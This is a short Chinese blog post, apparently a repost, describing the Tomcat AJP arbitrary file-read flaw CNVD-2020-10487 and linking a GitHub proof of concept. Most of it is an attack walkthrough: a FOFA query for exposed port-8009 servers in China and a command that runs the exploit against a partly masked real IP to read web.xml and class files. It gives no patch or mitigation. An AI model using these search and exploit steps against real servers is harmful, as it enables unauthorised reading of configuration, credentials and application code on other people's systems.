Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapps目录下的任意文件,但不能跨到上级目录。
PoC来自GitHub:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
第一步:利用FOFA搜索8009端口
port="8009" && country="CN"
第二步:运行PoC
python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py 151.*.*.114 -p 8009 -f /WEB-INF/web.xml
1.读取web.xml
2.读取*.class文件
原文地址:https://www.cnblogs.com/dgjnszf/p/12345344.html
时间: 2024-10-08 01:15:06